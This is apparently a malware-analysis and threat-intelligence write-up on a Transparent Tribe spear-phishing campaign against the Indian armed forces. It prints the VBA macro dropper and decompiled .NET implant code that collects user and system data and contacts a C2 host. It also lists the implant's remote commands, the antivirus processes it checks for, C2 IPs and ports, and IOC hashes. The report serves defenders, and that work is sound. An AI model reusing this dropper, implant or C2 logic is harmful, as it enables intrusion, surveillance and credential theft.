- Malware analysis
- Threat Intelligence
- Cyber kill chain
- Indicators Of Compromise (IOC)
- Yara Rules
- References MITRE ATT&CK Matrix
- Links
The initial vector is from a decoy document probably shared from a spear-phishing (a copy of the content can be viewed here), this document have two links for download additionals informations. The both maldoc , this uses a macro for extract and executes the PE file depends on the version of the operating system.
Sub unMoferzip(Fname As Variant, FileNameFolder As Variant)
Dim FSO As Object
Dim oApp As Object
'Extract the files into the Destination folder
Set oApp = CreateObject("Shell.Application")
oApp.Namespace(FileNameFolder).CopyHere oApp.Namespace(Fname).items, &H4
End Sub
Sub MoferfileLdr()
Dim path_Mofer_file As String
Dim file_Mofer_name As String
Dim zip_Mofer_file As Variant
Dim fldr_Mofer_name As Variant
file_Mofer_name = "ulhtagnias"
fldr_Mofer_name = Environ$("ALLUSERSPROFILE") & "\DeIA-WIR\"
If Dir(fldr_Mofer_name, vbDirectory) = "" Then
MkDir (fldr_Mofer_name)
End If
zip_Mofer_file = fldr_Mofer_name & file_Mofer_name & ".zip"
path_Mofer_file = fldr_Mofer_name & file_Mofer_name & ".exe"
Dim ar1Mofer() As String
Dim btsMofer() As Byte
If InStr(Application.System.Version, "6.2") > 0 Or InStr(Application.System.Version, "6.3") > 0 Then
ar1Mofer = Split(UserForm1.TextBox2.Text, "'")
Else
ar1Mofer = Split(UserForm1.TextBox1.Text, "'")
End If
Dim linMofer As Double
linMofer = 0
For Each vl In ar1Mofer
ReDim Preserve btsMofer(linMofer)
btsMofer(linMofer) = CByte(vl)
linMofer = linMofer + 1
Next
Open zip_Mofer_file For Binary Access Write As #2
Put #2, , btsMofer
Close #2
If Len(Dir(path_Mofer_file)) = 0 Then
Call unMoferzip(zip_Mofer_file, fldr_Mofer_name)
End If
Shell path_Mofer_file, vbNormalNoFocus
End Sub
The .NET implant begins to load the recon actions, push a timer for sleep the process and try to join the C2.
public void ulhtagniasdo_start()
{
ulhtagniasCONF.ulhtagniasport = ulhtagniasCONF.ports[0];
this.ulhtagniasrunTime = DateTime.Now;
this.ulhtagniasUPC = new ulhtagniasMYINF();
this.ulhtagniasCMD = new ulhtagniasOCMD(this);
this.ulhtagniasHD.iserver = this;
this.ulhtagniasHD.ulhtagniasmainPath = ulhtagniasCONF.ulhtagniasget_mpath();
TimerCallback callback = new TimerCallback(this.ulhtagniaslookup_connect);
System.Threading.Timer ulhtagniastimer = new System.Threading.Timer(callback, this.ulhtagniasStateObj, 32110, 36110);
this.ulhtagniasStateObj.ulhtagniastimer = ulhtagniastimer;
}
Once the connexion is establish with the C2, this sends the informations of the user, system, sensible AV (who detect it easily) and this repertory (here from a trace of the TCP stream of an Anyrun sandbox)
.....info=command.....ulhtagnias-info=user8....|USER-PC|admin||6>1|S.P.1.3|| ||C:\ProgramData\DeIA-WIR\.....clping=Ping.....clping=Ping
private void ulhtagniasuser_info()
{
string text = string.Concat(new string[]
{
this.ulhtagniasUPC.ulhtagniaslancard,"|",this.ulhtagniasUPC.ulhtagniascname,"|",
this.ulhtagniasUPC.ulhtagniasuname,"|",this.ulhtagniasUPC.ulhtagniasuip,"|",
ulhtagniasCONF.ulhtagniasOsname(),"|",this.ulhtagniasUPC.ulhtagniasapver,"|",
ulhtagniasCONF.ulhtagniasloadAV()
});
text += "| !ulhtagnias".Split(new char[]{'!'})[0];
text = text + "|" + this.ulhtagniasUPC.ulhtagniasclientNum;
text = text + "|" + ulhtagniasCONF.ulhtagniasget_mpath();
byte[] byteArray = ulhtagniasCONF.getByteArray(text);
this.ulhtagniaspush_data(byteArray, "ulhtagnias-info=user|ulhtagnias".Split(new char[]{'|'})[0], false);
}
public static string ulhtagniasOsname()
{
string result;
try
{
OperatingSystem osversion = Environment.OSVersion;
result = osversion.Version.Major.ToString() + ">" + osversion.Version.Minor.ToString();
}
catch {result = "6>1!ulhtagnias".Split(new char[]{'!'})[0];}
return result;
}
The name of PE file is used as identifier and the command by a couple {nameimplant-command}.This can perform the actions by the following commands :
Command | Description |
---|---|
-procl | Get the list of process |
-thumb | Get info of a picture |
-clping | Check activity |
-putsrt | Push the persistence in a Run key |
-filsz | Get infos of a specific file |
-rupth | Push the data received |
-dowf | Save to a file the data pushed on the system |
-endpo | Kill a process |
-scrsz | Get the size of the screen |
-cownar | Download and run a executable file |
-cscreen | Get a screenshot |
-dirs | List all the drives and directories |
-stops | stop the mod for get periodical screenshot |
-scren | start the mod for get periodical screenshot |
-cnls | Allow index, send data and disable continue screenshot |
-udlt | Download and execute an executable for remove an user ? |
-delt | Delete a specific file |
-listf | List files |
-file | Get a specific file |
-info | Get user and system infos, check if the AV is on blacklist |
-runf | Execute a specific file |
-dowr | Download a file on the system |
-fldr | Get folders and go silent mod |
public static byte[] encAvs = new byte[]{98,100,115,115,61,66,105,116,32,68,101,102,101,110,100,101,114,44,111,110,108,105,110,101,110,116,61,81,46,72,101,97,108,44,98,100,97,103,101,110,116,61,66,105,116,32,68,101,102,101,110,100,101,114,32,65,103,101,110,116,44,109,115,115,101,99,101,115,61,77,83,32,69,115,115,101,110,116,105,97,108,115,44,102,115,115,109,51,50,61,70,83,101,99,117,114,101,44,97,118,112,61,75,97,115,112,101,114,115,107,121,44,97,118,103,110,116,61,65,118,105,114,97,44,115,112,98,98,99,115,118,99,61,83,121,109,97,110,116,101,99,44,117,112,100,97,116,101,114,117,105,61,77,99,65,102,101,101,44,97,118,103,117,105,61,65,86,71,44,97,118,103,99,99,61,65,86,71,44,109,98,97,109,61,65,110,116,32,77,97,108,119,97,114,101,44,97,118,97,115,116,117,105,61,65,118,97,115,116,44,97,118,97,115,116,61,65,118,97,115,116};
This can be easily viewable in an oneliner (UTF8 + Getstring) and show the list of sensible AV to detect.
PS> ([System.Text.Encoding]::UTF8.GetString($encAvs)).split(",")
bdss=Bit Defender
onlinent=Q.Heal
bdagent=Bit Defender Agent
msseces=MS Essentials
fssm32=FSecure
avp=Kaspersky
avgnt=Avira
spbbcsvc=Symantec
updaterui=McAfee
avgui=AVG
avgcc=AVG
mbam=Ant Malware
avastui=Avast
avast=Avast
With the same logic, we can get the content of the second array which get the IP of the C2 to contact.
PS> ([System.Text.Encoding]::UTF8.GetString($tab)).split(",")
198.46.177.73
public static string ulhtagniasmainApp = "ulhtagnias|ulhtagnias".Split(new char[]{'|'})[0];
public static string ulhtagniaspc_id = "vhldsp|ulhtagnias".Split(new char[]{'|'})[0];
public static string ulhtagniasremvUser = "drlarmn|ulhtagnias".Split(new char[]{'|'})[0];
public static string ulhtagniasfilesLogs = "rndlbes".Split(new char[]{'|'})[0];}
public static string ulhtagniasdefaultP = "122.200.110.101|ulhtagnias".Split(new char[]{'|'})[0];
public static int[] ports = new int[]{6421,4920,10422,14823,16824};
public void ulhtagniasports_switch()
{
try
{
this.port_sn++;
ulhtagniasCONF.ulhtagniasport = ulhtagniasCONF.ports[this.port_sn];
if (this.port_sn >= ulhtagniasCONF.ports.Length - 1){this.port_sn = 0;}
}
catch{this.port_sn = 0;}
}
- ulhtagnias.exe
- Special Benefits.docx
- Criteria of Army Officers.doc
- 7All Selected list.xls
pdb path | g:\ulhtagnias\ulhtagnias\obj\Debug\ulhtagnias.pdb |
Compilation time | 2020-01-09 21:21:34 |
Creator | Dell-R |
Last Modified By | Bipin |
Creation date | 2020-01-15 10:02:00 |
Last Modified Date | 2020-01-17 04:41:00 |
Software used | Microsoft Office Word 12.0 (2007) |
Creator | Bipin |
Last Modified By | Bipin |
Creation date | 2020-01-12 07:14:43 |
Last Modified Date | 2020-01-12 07:14:43 |
Software used | Microsoft Office Word 12.0 (2007) |
Creator | |
Last Modified By | |
Creation date | 2020-01-12 07:04:53 |
Last Modified Date | 2020-01-12 07:08:59 |
Software used | Microsoft Office Word 12.0 (2007) |
Several interesting things are to be reported. Firstly, the NET implant was designed first for the event, secondly, the maldoc are planned before the idea of the decoy document to download them. The Bipin account often comes up in Transparent Tribe campaigns, possibly it is responsible for the development of malicious tools, in this logic the other "Dell-R" account would be responsible for the templates of the decoys.The fact that the document is delivered after the celebration is not a problem in the logic that it should be given as a reward after the event, so the team could hang longer than if it would have an announcement related only to the day of the event.
This operation uses the recent event of the 72nd year of the independence of the Indian armed forces. The Transparent Tribe group specializes in its field of attack in the Indian armed forces.
The main purpose of this operation isn't to obtain more information from arms tests since the lasts month by the various Indian armed groups but, first of all, to collect identities and credentials to conduct more extensive operations.
Indicator | Description |
---|---|
Special Benefits.docx | 6c9c6966ce269bbcab164aca3c3f0231af1f7b26a18e5abc927b2ccdd9499368 |
Criteria of Army Officers.doc | 1cb726eab6f36af73e6b0ed97223d8f063f8209d2c25bed39f010b4043b2b8a1 |
7All Selected list.xls | 2aa160726037e80384672e89968ab4d2bd3b7f5ca3dfa1b9c1ecc4d1647a63f0 |
ulhtagnias.exe | d2c46e066ff7802cecfcb7cf3bab16e63827c326b051dc61452b896a673a6e67 |
198.46.177.73 | IP C2 |
The IOC can be exported in JSON
Enterprise tactics | Technics used | Ref URL |
---|---|---|
Discovery | Query Registry | https://attack.mitre.org/techniques/T1012/ |
C&C | Uncommonly Used Port | https://attack.mitre.org/techniques/T1065/ |
Defense Evasion | Scripting | https://attack.mitre.org/techniques/T1064/ |
Execution | Scripting | https://attack.mitre.org/techniques/T1064/ |